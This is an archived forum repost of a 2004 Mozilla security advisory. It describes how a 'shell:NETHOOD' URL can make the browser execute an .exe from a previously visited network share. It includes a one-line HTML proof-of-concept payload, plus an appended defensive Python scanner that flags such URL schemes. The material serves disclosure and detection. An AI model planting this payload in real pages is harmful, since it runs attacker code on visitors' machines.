EvilOctal Security Team Technical Discussion Group's Archiver

冰血封情 2004-7-13 03:19

[Repost] SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <liudieyu@umbrella.name>
                  #
[START] Advisory


COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )



TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709



PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"


At last, make MOZILLA request the following URL:


shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe


A file named "fileid.exe" in the "shared" folder will be executed.



REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.


WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.


liudieyu
http://umbrella.name



            #
[START] PROOF OF CONCEPT
          ###
<!--
MOZILLA REMOTE COMPROMISE DEMO


REPLACE "[" WITH "<", and REPLACE "]" WITH ">".


!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.


PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.



CREATED BY:
"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME


COPYRIGHT:
This Demo is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu@umbrella.name)
-->


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]


http://seclists.org/lists/fulldisclosure/2004/Jul/0425.html
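
A defender-side check for the pattern this advisory describes, added here as an example and not part of the original advisory or post: it lists URL-bearing HTML attributes whose scheme falls outside an allowlist, which catches `shell:` references like the one in the proof of concept. The attribute set, the allowlist, the step that restores bracket-defanged tags, and the sample input are all assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a browser fetches or navigates to (assumed set).
URL_ATTRS = {"src", "href", "data", "action", "background", "codebase"}
# Assumed allowlist policy: schemes the browser handles itself.
ALLOWED_SCHEMES = {"http", "https", "ftp", "mailto"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def url_scheme(value):
    """Return the lowercased scheme of a URL attribute, or None if relative."""
    # Browsers drop tab/CR/LF inside URLs and trim leading controls and spaces.
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip("".join(map(chr, range(0x21))))
    match = SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else None


class SchemeAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            scheme = url_scheme(value)
            if scheme and scheme not in ALLOWED_SCHEMES:
                line, _ = self.getpos()
                self.findings.append((line, tag, name, scheme))


def audit_html(text):
    """Return (line, tag, attribute, scheme) for each non-allowlisted URL."""
    # Undo [TAG ...] defanging so archived copies of a page are scanned too.
    restored = re.sub(r"\[(/?[a-zA-Z][^\[\]]*)\]", r"<\1>", text)
    auditor = SchemeAuditor()
    auditor.feed(restored)
    auditor.close()
    return auditor.findings


# Constructed sample input (placeholder share and file names).
SAMPLE = """<a href="https://example.org/">ok</a>
<img src="images/logo.png">
<img src=" Shell:NETHOOD\\example share\\placeholder.exe">
[IMG SRC="sh\tell:NETHOOD\\example share\\placeholder.exe"]
"""
```

Calling `audit_html(SAMPLE)` reports the two `shell:` references on lines 3 and 4, including the one hidden behind mixed case, a leading space, and an embedded tab.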
